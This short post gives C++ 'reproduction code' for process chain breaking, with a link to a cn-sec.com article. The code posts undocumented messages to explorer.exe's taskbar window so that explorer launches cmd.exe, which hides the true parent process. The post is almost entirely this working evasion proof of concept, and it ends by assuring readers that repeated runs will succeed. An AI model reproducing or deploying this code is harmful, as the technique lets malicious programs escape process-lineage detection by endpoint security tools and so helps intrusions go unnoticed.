Process Chain Breaking: Reproduction Code

May 25, 2023

Original article: https://cn-sec.com/archives/1734689.html

Reproduction code:

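#include <iostream>
#include <Windows.h>
#include <tchar.h>
#include <CommCtrl.h>
// Message IDs posted to the Shell_TrayWnd window
#define TM_REGKEY           0x4e9
#define TM_RUNKEY           0x312
#define TM_UNKEY            0x4EA
int main() {
	// Locate the taskbar window owned by explorer.exe
	HWND tray_wnd = FindWindowA("Shell_TrayWnd", NULL);
	if (tray_wnd == NULL) {
		// Without this check, PostMessageA(NULL, ...) would post to our own thread queue
		return 1;
	}
	// The command line is passed by global atom, since the message only carries integers
	ATOM atom = GlobalAddAtom(TEXT("C:\\Windows\\SysWOW64\\cmd.exe"));
	if (atom == 0) {
		return 1;
	}
	// Post TM_REGKEY for each key 'A'..'K', with the atom as lParam
	for (char key = 'A'; key <= 'K'; ++key) {
		WORD wHotkey = key;
		Sleep(100);
		PostMessageA(tray_wnd, TM_REGKEY, wHotkey, atom);
	}
	Sleep(100);
	// Post TM_RUNKEY with wParam 10
	PostMessageA(tray_wnd, TM_RUNKEY, 10, 0);
	Sleep(100);
	// Post TM_UNKEY for the same keys to undo the registrations
	for (char key = 'A'; key <= 'K'; ++key) {
		WORD wHotkey = key;
		Sleep(100);
		PostMessageA(tray_wnd, TM_UNKEY, wHotkey, 0);
	}
	return 0;
}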

It is still a matter of probability, but the success rate is high (lol). Run it a few more times and it will definitely work.